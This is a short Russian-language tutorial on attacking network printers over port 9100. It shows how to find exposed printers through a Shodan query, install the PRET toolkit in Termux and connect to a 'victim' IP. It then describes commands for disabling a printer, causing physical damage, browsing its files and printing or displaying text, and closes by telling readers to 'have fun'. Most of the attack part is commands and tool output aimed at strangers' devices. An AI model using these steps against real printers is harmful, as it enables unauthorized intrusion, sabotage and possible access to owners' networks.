Взлом принтеров с помощью termux

Всем привет! В сегодняшней статье разберём взлом принтеров с помощью termux.

Часть 1

Данная уязвимость размещается на 9100 порту. С помощью этого открытого порта можем подключиться к любому принтеру, и из него уже провернуть что-то масштабное.

Откуда же брать Ip адреса уязвимых принтеров?

Ответ очень прост - заходим на сайт shodan, потом пишем следующую команду:

port:9100 pjl

И выбираем любой понравившейся )

Теперь приступим к утилите, которая будет осуществлять взлом.

PRET - утилита для проверки на защищенность вашего принтера.

Установка:

pkg update

pkg upgrade

pkg install git

pkg install python2 python

git clone https://github.com/RUB-NDS/PRET

cd PRET

pip install colorama pysnmP

   Установка закончена, теперь запускаем:

Запуск:

python2 pret.py <IP> pjl

Вместо <IP> вводим ip жертвы, пример : python2 pret.py 192.168.1.1 pjl

У вас высветится что-то подобное:

$ ./pret.py <IP> pjl
      ________________
    _/_______________/|
   /___________/___//||   PRET | Printer Exploitation Toolkit v0.25
  |===        |----| ||    by Jens Mueller <[email protected]>
  |           |   ô| ||
  |___________|   ô| ||
  | ||/.´---.||    | ||        「 cause your device can be
  |-||/_____\||-.  | |´           more fun than paper jams 」
  |_||=L==H==||_|__|/

     (ASCII art by
     Jan Foerster)

Connection to laserjet.lan established
Device:   hp LaserJet 4250

Welcome to the pret shell. Type help or ? to list commands.
laserjet.lan:/> help

Available commands (type help <topic>):
=======================================
append  debug    edit    free  id    ls       open      restart   timeout 
cat     delete   env     fuzz  info  mirror   printenv  selftest  touch   
cd      df       exit    get   load  mkdir    put       set       traversal
chvol   disable  find    help  lock  nvram    pwd       site      unlock  
close   display  format  hold  loop  offline  reset     status    version 

Теперь объясню некоторые команды:

disable - выключение принтера

destroy - физический урон

fuzz path - команда покажет директории которые были связанны с принтером. Можно с простого принтера залезть в компьютер жертвы.

print - распечатать что-либо

display <TEXT> - вывести какую-либо информацию на дисплей принтера

На этом закончим, Развлекайтесь)